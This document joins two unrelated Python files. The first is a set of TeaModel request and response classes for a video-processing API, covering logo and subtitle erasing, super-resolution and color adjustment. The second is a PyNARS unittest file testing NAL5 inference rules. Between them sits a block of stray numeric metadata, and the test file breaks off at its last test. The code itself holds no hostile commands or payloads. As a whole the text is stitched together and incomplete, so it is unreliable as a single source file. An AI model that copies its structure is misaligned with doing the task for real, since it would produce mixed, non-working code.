    def __init__(self, video_url=None, bit_rate=None):
        self.video_url = video_url  # required
        self.bit_rate = bit_rate

    def validate(self):
        """Raise via TeaModel.validate_required if video_url is missing."""
        self.validate_required(self.video_url, 'video_url')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['VideoUrl'] = self.video_url
        result['BitRate'] = self.bit_rate
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.video_url = map.get('VideoUrl')
        self.bit_rate = map.get('BitRate')
        return self
class SuperResolveVideoResponse(TeaModel):
    """Response wrapper: RequestId plus nested SuperResolveVideoResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # SuperResolveVideoResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = SuperResolveVideoResponseData().from_map(data) if data is not None else None
        return self
class SuperResolveVideoResponseData(TeaModel):
    """Payload: URL of the super-resolved video; required."""
    def __init__(self, video_url=None):
        self.video_url = video_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'VideoUrl': self.video_url}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        return self
class SuperResolveVideoAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of SuperResolveVideoRequest."""
    def __init__(self, video_url_object=None, bit_rate=None):
        self.video_url_object = video_url_object  # required file-like object
        self.bit_rate = bit_rate                  # optional
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrlObject': self.video_url_object,
            'BitRate': self.bit_rate,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        self.bit_rate = map.get('BitRate')
        return self
class EraseVideoLogoRequest(TeaModel):
    """Request model for EraseVideoLogo: a video URL plus optional logo boxes."""
    def __init__(self, video_url=None, boxes=None):
        self.video_url = video_url
        # BUG FIX: the `boxes` argument was previously ignored (the field was
        # always reset to []); it is now honored, defaulting to a fresh list.
        self.boxes = [] if boxes is None else boxes
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
        if self.boxes:
            for box in self.boxes:
                if box:
                    box.validate()
    def to_map(self):
        """Serialize to a wire-format dict; each box is serialized recursively."""
        result = {'VideoUrl': self.video_url}
        if self.boxes is not None:
            result['Boxes'] = [box.to_map() if box else None for box in self.boxes]
        else:
            result['Boxes'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        if map.get('Boxes') is not None:
            self.boxes = [EraseVideoLogoRequestBoxes().from_map(item)
                          for item in map.get('Boxes')]
        else:
            self.boxes = None
        return self
class EraseVideoLogoRequestBoxes(TeaModel):
    """Axis-aligned box (H/W/X/Y) marking a logo region; all fields optional."""
    def __init__(self, h=None, w=None, x=None, y=None):
        self.h = h
        self.w = w
        self.x = x
        self.y = y
    def validate(self):
        """No required fields."""
        pass
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'H': self.h, 'W': self.w, 'X': self.x, 'Y': self.y}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.h = map.get('H')
        self.w = map.get('W')
        self.x = map.get('X')
        self.y = map.get('Y')
        return self
class EraseVideoLogoResponse(TeaModel):
    """Response wrapper: RequestId plus nested EraseVideoLogoResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # EraseVideoLogoResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = EraseVideoLogoResponseData().from_map(data) if data is not None else None
        return self
class EraseVideoLogoResponseData(TeaModel):
    """Payload: URL of the logo-erased video; required."""
    def __init__(self, video_url=None):
        self.video_url = video_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'VideoUrl': self.video_url}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        return self
class EraseVideoLogoAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of EraseVideoLogoRequest."""
    def __init__(self, video_url_object=None, boxes=None):
        self.video_url_object = video_url_object
        # BUG FIX: the `boxes` argument was previously ignored (the field was
        # always reset to []); it is now honored, defaulting to a fresh list.
        self.boxes = [] if boxes is None else boxes
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
        if self.boxes:
            for box in self.boxes:
                if box:
                    box.validate()
    def to_map(self):
        """Serialize to a wire-format dict; each box is serialized recursively."""
        result = {'VideoUrlObject': self.video_url_object}
        if self.boxes is not None:
            result['Boxes'] = [box.to_map() if box else None for box in self.boxes]
        else:
            result['Boxes'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        if map.get('Boxes') is not None:
            self.boxes = [EraseVideoLogoAdvanceRequestBoxes().from_map(item)
                          for item in map.get('Boxes')]
        else:
            self.boxes = None
        return self
class EraseVideoLogoAdvanceRequestBoxes(TeaModel):
    """Axis-aligned box (H/W/X/Y) marking a logo region; all fields optional."""
    def __init__(self, h=None, w=None, x=None, y=None):
        self.h = h
        self.w = w
        self.x = x
        self.y = y
    def validate(self):
        """No required fields."""
        pass
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'H': self.h, 'W': self.w, 'X': self.x, 'Y': self.y}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.h = map.get('H')
        self.w = map.get('W')
        self.x = map.get('X')
        self.y = map.get('Y')
        return self
class EraseVideoSubtitlesRequest(TeaModel):
    """Request model for EraseVideoSubtitles; BX/BY/BW/BH bound the subtitle area."""
    def __init__(self, video_url=None, _bx=None, _by=None, _bw=None, _bh=None):
        self.video_url = video_url  # required
        self._bx = _bx
        self._by = _by
        self._bw = _bw
        self._bh = _bh
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrl': self.video_url,
            'BX': self._bx,
            'BY': self._by,
            'BW': self._bw,
            'BH': self._bh,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        self._bx = map.get('BX')
        self._by = map.get('BY')
        self._bw = map.get('BW')
        self._bh = map.get('BH')
        return self
class EraseVideoSubtitlesResponse(TeaModel):
    """Response wrapper: RequestId plus nested EraseVideoSubtitlesResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # EraseVideoSubtitlesResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = EraseVideoSubtitlesResponseData().from_map(data) if data is not None else None
        return self
class EraseVideoSubtitlesResponseData(TeaModel):
    """Payload: URL of the subtitle-erased video; required."""
    def __init__(self, video_url=None):
        self.video_url = video_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'VideoUrl': self.video_url}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        return self
class EraseVideoSubtitlesAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of EraseVideoSubtitlesRequest."""
    def __init__(self, video_url_object=None, _bx=None, _by=None, _bw=None, _bh=None):
        self.video_url_object = video_url_object  # required file-like object
        self._bx = _bx
        self._by = _by
        self._bw = _bw
        self._bh = _bh
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrlObject': self.video_url_object,
            'BX': self._bx,
            'BY': self._by,
            'BW': self._bw,
            'BH': self._bh,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        self._bx = map.get('BX')
        self._by = map.get('BY')
        self._bw = map.get('BW')
        self._bh = map.get('BH')
        return self
class AbstractEcommerceVideoRequest(TeaModel):
    """Request model for AbstractEcommerceVideo; `video_url` and `duration` required."""
    def __init__(self, video_url=None, duration=None, width=None, height=None):
        self.video_url = video_url  # required
        self.duration = duration    # required
        self.width = width          # optional
        self.height = height        # optional
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.duration, 'duration')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrl': self.video_url,
            'Duration': self.duration,
            'Width': self.width,
            'Height': self.height,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        self.duration = map.get('Duration')
        self.width = map.get('Width')
        self.height = map.get('Height')
        return self
class AbstractEcommerceVideoResponse(TeaModel):
    """Response wrapper: RequestId plus nested AbstractEcommerceVideoResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # AbstractEcommerceVideoResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = AbstractEcommerceVideoResponseData().from_map(data) if data is not None else None
        return self
class AbstractEcommerceVideoResponseData(TeaModel):
    """Payload: abstracted video URL and its cover image URL; both required."""
    def __init__(self, video_url=None, video_cover_url=None):
        self.video_url = video_url
        self.video_cover_url = video_cover_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.video_cover_url, 'video_cover_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrl': self.video_url,
            'VideoCoverUrl': self.video_cover_url,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        self.video_cover_url = map.get('VideoCoverUrl')
        return self
class AbstractEcommerceVideoAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of AbstractEcommerceVideoRequest."""
    def __init__(self, video_url_object=None, duration=None, width=None, height=None):
        self.video_url_object = video_url_object  # required file-like object
        self.duration = duration                  # required
        self.width = width                        # optional
        self.height = height                      # optional
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
        self.validate_required(self.duration, 'duration')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrlObject': self.video_url_object,
            'Duration': self.duration,
            'Width': self.width,
            'Height': self.height,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        self.duration = map.get('Duration')
        self.width = map.get('Width')
        self.height = map.get('Height')
        return self
class AbstractFilmVideoRequest(TeaModel):
    """Request model for AbstractFilmVideo; `video_url` and `length` required."""
    def __init__(self, video_url=None, length=None):
        self.video_url = video_url
        self.length = length
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.length, 'length')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrl': self.video_url,
            'Length': self.length,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        self.length = map.get('Length')
        return self
class AbstractFilmVideoResponse(TeaModel):
    """Response wrapper: RequestId plus nested AbstractFilmVideoResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # AbstractFilmVideoResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = AbstractFilmVideoResponseData().from_map(data) if data is not None else None
        return self
class AbstractFilmVideoResponseData(TeaModel):
    """Payload: URL of the abstracted film video; required."""
    def __init__(self, video_url=None):
        self.video_url = video_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'VideoUrl': self.video_url}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        return self
class AbstractFilmVideoAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of AbstractFilmVideoRequest."""
    def __init__(self, video_url_object=None, length=None):
        self.video_url_object = video_url_object  # required file-like object
        self.length = length                      # required
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
        self.validate_required(self.length, 'length')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrlObject': self.video_url_object,
            'Length': self.length,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        self.length = map.get('Length')
        return self
class AdjustVideoColorRequest(TeaModel):
    """Request model for AdjustVideoColor; `video_url` and `mode` required."""
    def __init__(self, video_url=None, video_bitrate=None, video_codec=None, video_format=None, mode=None):
        self.video_url = video_url          # required
        self.video_bitrate = video_bitrate  # optional
        self.video_codec = video_codec      # optional
        self.video_format = video_format    # optional
        self.mode = mode                    # required
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.mode, 'mode')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrl': self.video_url,
            'VideoBitrate': self.video_bitrate,
            'VideoCodec': self.video_codec,
            'VideoFormat': self.video_format,
            'Mode': self.mode,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        self.video_bitrate = map.get('VideoBitrate')
        self.video_codec = map.get('VideoCodec')
        self.video_format = map.get('VideoFormat')
        self.mode = map.get('Mode')
        return self
class AdjustVideoColorResponse(TeaModel):
    """Response wrapper: RequestId plus nested AdjustVideoColorResponseData."""
    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # AdjustVideoColorResponseData instance
    def validate(self):
        """Both fields are required; the nested payload validates itself."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested data is serialized recursively."""
        return {
            'RequestId': self.request_id,
            'Data': self.data.to_map() if self.data is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        data = map.get('Data')
        self.data = AdjustVideoColorResponseData().from_map(data) if data is not None else None
        return self
class AdjustVideoColorResponseData(TeaModel):
    """Payload: URL of the color-adjusted video; required."""
    def __init__(self, video_url=None):
        self.video_url = video_url
    def validate(self):
        self.validate_required(self.video_url, 'video_url')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'VideoUrl': self.video_url}
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url = map.get('VideoUrl')
        return self
class AdjustVideoColorAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of AdjustVideoColorRequest."""
    def __init__(self, video_url_object=None, video_bitrate=None, video_codec=None, video_format=None, mode=None):
        self.video_url_object = video_url_object  # required file-like object
        self.video_bitrate = video_bitrate        # optional
        self.video_codec = video_codec            # optional
        self.video_format = video_format          # optional
        self.mode = mode                          # required
    def validate(self):
        self.validate_required(self.video_url_object, 'video_url_object')
        self.validate_required(self.mode, 'mode')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'VideoUrlObject': self.video_url_object,
            'VideoBitrate': self.video_bitrate,
            'VideoCodec': self.video_codec,
            'VideoFormat': self.video_format,
            'Mode': self.mode,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fix)."""
        map = {} if map is None else map
        self.video_url_object = map.get('VideoUrlObject')
        self.video_bitrate = map.get('VideoBitrate')
        self.video_codec = map.get('VideoCodec')
        self.video_format = map.get('VideoFormat')
        self.mode = map.get('Mode')
        return self
| 31.194194
| 200
| 0.603376
| 3,801
| 31,163
| 4.731123
| 0.036832
| 0.068509
| 0.073403
| 0.084079
| 0.843018
| 0.832119
| 0.813991
| 0.792137
| 0.76539
| 0.744258
| 0
| 0
| 0.279241
| 31,163
| 998
| 201
| 31.225451
| 0.800632
| 0.001637
| 0
| 0.848086
| 1
| 0
| 0.072035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177033
| false
| 0.002392
| 0.001196
| 0
| 0.311005
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
671c7d8f987b5ef026ab9c485d0612db3dd91853
| 44,997
|
py
|
Python
|
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
'''
test NAL5
'''
import unittest
from pathlib import Path
from pynars import NARS, Narsese
import Tests.utils_for_test as utils_for_test
from pynars.NAL.MetaLevelInference.VariableSubstitution import *
from pynars.NARS import Reasoner as Reasoner
from pynars.NARS.DataStructures import Bag, Concept, Table, Task
from pynars.NARS.DataStructures._py.Link import TaskLink, TermLink
from pynars.NARS.RuleMap import RuleMap
from pynars.Narsese import (Compound, Connector, Copula, Judgement, Statement, Term,
Truth, Variable, VarPrefix)
from Tests.utils_for_test import *
# utils_for_test.rule_map = RuleMap_v2()
class TEST_NAL5(unittest.TestCase):
''''''
def test_revision(self):
'''
'Revision
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin can fly then robin may not a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %0.00;0.60%
1
'If robin can fly then robin is a type of bird.
''outputMustContain('<<robin --> [flying]> ==> <robin --> bird>>. %0.86;0.91%')
'''
tasks_derived = memory_accept_revision(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %0.00;0.60% '
)
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> bird>>. %0.86;0.91%')
)
pass
def test_deduction(self):
'''
'Deduction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.9%
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.9%
14
'If robin can fly then robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.9%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.9%',
'<robin --> bird>.', index_task=(0,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_exemplification(self):
'''
'Exemplification
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
19
'I guess if robin is a type of animal then robin can fly.
''outputMustContain('<<robin --> animal> ==> <robin --> [flying]>>. %1.00;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> animal> ==> <robin --> [flying]>>. %1.00;0.45%')
)
pass
def test_induction(self):
'''
'Induction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%
140
'I guess if robin can fly then robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.39%')
'I guess if robin is a type of animal then robin can fly.
''outputMustContain('<<robin --> animal> ==> <robin --> [flying]>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> animal> ==> <robin --> [flying]>>. %0.80;0.45%')
)
# for task in tasks_derived:
# print(task)
pass
def test_abduction(self):
'''
'Abduction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is probably a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.90%
19
'I guess if robin is a type of bird then robin can fly.
''outputMustContain('<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.39%')
'I guess if robin can fly then robin is a type of bird.
''outputMustContain('<<robin --> [flying]> ==> <robin --> bird>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> bird>>. %0.80;0.45%')
)
for task in tasks_derived:
print(task)
pass
def test_conditional_deduction_0(self):
'''
'Detachment
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'Robin is a type of bird.
<robin --> bird>. %1.00;0.90%
1
'Robin is a type of animal.
''outputMustContain('<robin --> animal>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> animal>. %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> animal>. %1.00;0.81%')
)
pass
def test_conditional_abduction(self):
'''
'Detachment
'Usually if robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%
'Robin is a type of animal.
<robin --> animal>. %1.00;0.90%
1
'I guess robin is a type of bird.
''outputMustContain('<robin --> bird>. %1.00;0.36%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%',
'<robin --> animal>. %1.00;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> bird>. %1.00;0.36%')
)
pass
def test_comparison_0(self):
'''
'Detachment
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%
14
'I guess robin is a type of animal if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> animal>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> animal>>. %0.80;0.45%')
)
pass
def test_comparison_1(self):
'''
'Detachment
'If robin is a type of bird then usually robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.90%
19
'I guess robin is a type of bird if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> bird>>. %0.70;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> bird>>. %0.70;0.45%')
)
pass
def test_analogy(self):
'''
'Detachment
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'Usually, robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%
14
'If robin can fly then probably robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.65%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.65%')
)
pass
def test_conditional_analogy(self):
'''
'Detachment
'Robin is a type of bird.
<robin --> bird>. %1.00;0.90%
'Usually, robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%
1
'I guess usually robin can fly.
''outputMustContain('<robin --> [flying]>. %0.80;0.65%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
